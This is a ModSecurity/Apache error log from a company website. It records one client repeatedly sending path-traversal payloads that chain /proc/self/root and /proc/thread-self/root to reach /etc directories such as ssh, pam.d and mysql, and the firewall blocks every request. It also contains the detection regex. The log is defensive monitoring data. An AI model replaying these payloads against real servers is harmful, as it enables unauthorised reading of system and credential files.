[Wed Mar 18 05:59:09.422974 2026] [:error] [pid 30077:tid 140411632822016] [client 74.7.243.128:33512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppXfu8EFLIOrSqIpvUlAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:10.715028 2026] [:error] [pid 29882:tid 140411599251200] [client 74.7.243.128:33526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppXkzinOy1jxa1j4fhIgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:13.035050 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.243.128:33540] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppYMdf6f5d65gmYZShGQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:14.389241 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:33550] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppYta6ubjKNq_cu4ZlJAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:15.692143 2026] [:error] [pid 30077:tid 140411616036608] [client 74.7.243.128:33560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppY_u8EFLIOrSqIpvUoAAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:17.083371 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:33566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppZeyqAr6etmhZHNqKSAAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:17.291282 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.243.128:33566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppZeyqAr6etmhZHNqKSQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:18.668025 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:33582] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppZgkwaGbbGflqUZDf6AAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:19.966628 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.243.128:58846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppZymAPhZkrhU8w4k9eQAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:21.311095 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:58862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppacdf6f5d65gmYZShHQAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:22.722206 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:58872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppauoXxyEfFpUF8f87WAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:24.058958 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:58886] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppbOoXxyEfFpUF8f87WQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:25.423409 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:58900] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppbSmAPhZkrhU8w4k9fQAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:26.750814 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:58902] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppbta6ubjKNq_cu4ZlKgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:28.137787 2026] [:error] [pid 31803:tid 140411548894976] [client 74.7.243.128:58912] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppcOyqAr6etmhZHNqKUwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:29.452218 2026] [:error] [pid 15051:tid 140411699963648] [client 74.7.243.128:60244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppcSmAPhZkrhU8w4k9hAAAAIU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:30.811100 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:60258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppcvu8EFLIOrSqIpvUtwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:32.131040 2026] [:error] [pid 11816:tid 140411725141760] [client 74.7.243.128:60266] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppdOw_le52K8_3pV2v0AAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:33.472774 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:60278] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppdcdf6f5d65gmYZShIwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:34.843597 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.243.128:60282] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppdimAPhZkrhU8w4k9iAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:59:37.275368 2026] [:error] [pid 17653:tid 140411683178240] [client 74.7.243.128:60296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abppecdf6f5d65gmYZShJwAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
